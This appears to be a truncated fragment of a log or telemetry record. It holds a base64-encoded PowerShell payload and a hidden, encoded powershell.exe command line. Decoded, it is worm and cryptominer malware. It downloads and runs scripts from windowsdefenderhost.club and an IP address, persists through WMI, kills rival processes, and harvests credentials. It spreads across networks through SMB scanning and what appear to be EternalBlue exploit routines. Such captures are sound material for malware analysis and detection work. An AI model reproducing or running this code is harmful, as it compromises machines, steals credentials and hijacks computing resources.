QADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMA